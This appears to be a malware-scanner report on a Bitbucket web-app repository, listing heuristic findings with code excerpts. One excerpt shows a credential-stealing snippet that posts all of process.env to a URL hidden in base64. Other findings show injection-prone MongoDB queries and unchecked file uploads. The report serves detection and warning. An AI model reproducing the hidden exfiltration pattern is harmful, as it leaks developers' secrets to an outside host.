live · scanning repos
Scanrepo
bitbucket.org
DANGER
malware detected
bitbucket.org / lasalle_tech_brittney

lasalle_tech_brittney/mvp

58 files·commit cc23ddf·scanned 47m ago·cached ✓
70/100
DANGEROUS
Sensitive capability combinations reachable from entry points. Do not run without review.

This repository contains patterns associated with malware. Do NOT run this code.

verdict accurate?
Created 20 days ago
Created 20 days ago
threat-state: dangerouslive

FINDINGS ░▒▓

criticalSuspicious code is reachable from an entry pointFlagged files are imported by the application's entry path: src/pages/FAQ.jsx, src/pages/Home.jsx. This means the suspicious code can execute when the app runs.+8
warningCluster of suspicious files reachable from entry2 flagged files form a connected cluster that is reachable from an entry point, suggesting coordinated malicious behavior rather than isolated false positives.+5
infoSuspicious files are not reachable from entry pointsFlagged files exist but are not imported by any entry point. They may be dead code, tests, or attack payloads triggered by another mechanism.+2
infoBase64 encoding usedatob() or Buffer.from with base64. Common in legitimate code but also used to hide malicious URLs.server/controllers/auth.controller.js
  await axios.post(
    atob(config.HASHED_URL),
    { ...process.env },
    { headers: { "x-secret-header": "secret" } }
+2
warningExtremely long lines (>1000 chars)Very long lines in source files (not minified bundles) can hide malicious code.src/pages/FAQ.jsx+4
warningLarge base64-encoded blobA 84-character base64 blob was found. May hide a remote payload or encoded executable code.server/config/config.js
aHR0cHM6Ly9pcGNoZWNrLWhhc2hlZC52ZXJjZWwuYXBwL2FwaS9hdXRoLzZj...
+3
warningHigh-entropy string literalsFound 4 long strings with high Shannon entropy. This is common in obfuscated payloads that hide URLs, keys, or bytecode.src/pages/Home.jsx+3
warningUnvalidated file uploadFile upload without type/size validation. Can be exploited for remote code execution or storage abuse.package.json
    "morgan": "^1.10.1",
    "multer": "^2.0.2",
    "paytmchecksum": "^1.5.1",
    "react": "^18.3.1",
+3
warningPotential NoSQL injectionUser input passed directly to MongoDB query (findOne, find, updateOne) without sanitization. Attacker can inject query operators.server/controllers/auth.controller.js
const changePass = (req, res) => {
  userM.findOne({ _id: req.body._id }).exec((err, res) => {
    if (err)
      res.status(400).json({ message: "Something Went Wrong", data: err });
+4
warningPotential NoSQL injectionUser input passed directly to MongoDB query (findOne, find, updateOne) without sanitization. Attacker can inject query operators.server/controllers/common.controller.js
const getCityList = (req, res) => {
    city_model.find({ state_id: req.params.state_id, is_active: true })
        .populate('state_id', 'name')
        .exec((err, data) => {
+4
warningPotential NoSQL injectionUser input passed directly to MongoDB query (findOne, find, updateOne) without sanitization. Attacker can inject query operators.server/controllers/property.controller.js
const getUserList = (req, res) => {
    Property.find({ isActive: true, userId: req.params.userId })
        .populate('city', 'name')
        .populate('state', 'name')
+4
warningUnvalidated file uploadFile upload without type/size validation. Can be exploited for remote code execution or storage abuse.server/routes/property.js
const express = require('express');
const multer = require('multer');
const crypto = require('crypto');
const path = require('path');
+3

Scores are heuristics. A “safe” verdict means no known-malicious patterns were found — clever malware can look boring. Wrong verdict? Flag it above; confirmed false positives become regression tests.

43 files scanned @ cc23ddf | 9/25/2026 | heuristic scan — always review manually

risk by category
code execution15
network & exfiltration2
file system access0
obfuscation10
supply chain0
owasp / injection15
telemetry
files 43/58rules hit 12engine v6commit cc23ddf

bitbucket

lasalle_tech_brittney/mvp

2
0
20d
58 files
43 scanned(74%)
cc23ddf

architecture░▒▓

entry (1) flagged (8) pkg (27)
68 nodes · 127 edgesscroll to zoom · click node to jump to finding